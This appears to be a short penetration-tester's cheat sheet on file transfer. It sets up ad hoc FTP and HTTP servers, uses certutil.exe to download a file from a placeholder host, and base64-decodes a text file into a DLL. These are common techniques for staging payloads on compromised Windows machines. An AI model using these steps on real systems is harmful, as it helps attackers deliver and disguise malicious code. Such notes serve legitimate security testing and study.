python -m pyftpdlib -p 21 --write
python -m SimpleHTTPServer <port (defaults to 8000)>
Base64 encode your file if needed
certutil.exe -urlcache -split -f http://example/file.txt file.blah
Base64 decode using certutil:
certutil -decode dll.txt my.dll
https://www.trustedsec.com/blog/how-to-set-up-a-quick-simple-webdav-server-for-remote-file-sharing/